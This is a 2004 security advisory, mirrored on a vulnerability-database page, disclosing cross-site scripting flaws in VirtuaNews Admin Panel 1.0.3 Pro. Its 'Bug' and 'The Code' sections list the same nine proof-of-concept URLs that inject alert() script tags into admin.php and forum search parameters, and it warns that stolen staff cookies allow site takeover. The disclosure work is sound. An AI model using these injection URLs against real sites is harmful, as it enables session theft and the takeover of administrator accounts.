Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

virtuanews103.txt

🗓️ 05 Mar 2004 00:00:00Reported by Rafel IvgiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Cross Site Scripting vulnerability found in VirtuaNews Admin Panel, risking staff and websites.

Code
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Software: VirtuaNews Admin Panel  
Vendor: http://www.virtuanews.co.uk  
Versions: 1.0.3 Pro  
Platforms: Unix/Windows  
Bug: Cross Site Scripting Vulnerabillity  
Risk: Medium  
Exploitation: Remote with browser  
Date: 19 Feb 2004  
Author: Rafel Ivgi, The-Insider  
e-mail: [email protected]  
web: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bug  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
VirtuaNews Admin Panel is a good administration software. Many  
administrators choose it  
to be their "safe door", therefore it should strong and safe. The main risk  
describes in this  
advisory is the harm that could be done to the administration staff. When  
the vulnerabilities  
concerns the staff it is more dangerous that harming users, because if a  
staff's member cookie  
is stolen, the attackers can take over the website.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
The Vulnerabillity is Cross Site Scripting. If an attacker will request any  
of the following  
urls from the server:  
  
http://<host>/admin.php?"><script>alert('XSS')</script>  
http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X  
SS')</script>  
http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main  
news=~~~~"></textarea><script>alert('XSS')</script>  
http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main  
news=~~~~"></textarea>--><script>alert('XSS')</script>  
http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma  
innews=~~~~"></textarea><script>alert('XSS')</script>  
http://<host>/admin.php?action=files&expand="><script>alert('XSS')</script>  
http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s  
cript>  
http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr  
ipt>  
http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip  
t>  
  
XSS appears and the server allows an attacker to inject & execute scripts.  
  
In the words of securityfocus.com :  
~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
If all of these circumstances are met, an attacker may be able to exploit  
this issue  
via a malicious link containing arbitrary HTML and script code as part of  
the hostname.  
When the malicious link is clicked by an unsuspecting user, the  
attacker-supplied HTML  
and script code will be executed by their web client. This will occur  
because the server  
will echo back the malicious hostname supplied in the client's request,  
without sufficiently  
escaping HTML and script code.  
  
Attacks of this nature may make it possible for attackers to manipulate web  
content or to  
steal cookie-based authentication credentials. It may be possible to take  
arbitrary actions as the victim user.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
http://<host>/admin.php?"><script>alert('XSS')</script>  
http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X  
SS')</script>  
http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main  
news=~~~~"></textarea><script>alert('XSS')</script>  
http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main  
news=~~~~"></textarea>--><script>alert('XSS')</script>  
http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma  
innews=~~~~"></textarea><script>alert('XSS')</script>  
http://<host>/admin.php?action=files&expand="><script>alert('XSS')</script>  
http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s  
cript>  
http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr  
ipt>  
http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip  
t>  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Things that are unlikeable, are NOT impossible."  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Mar 2004 00:00Current
7.4High risk
Vulners AI Score7.4
cross site scriptingvirtuanews admin panelvulnerabilityadministration softwaremedium riskremote exploitationunixwindows.
21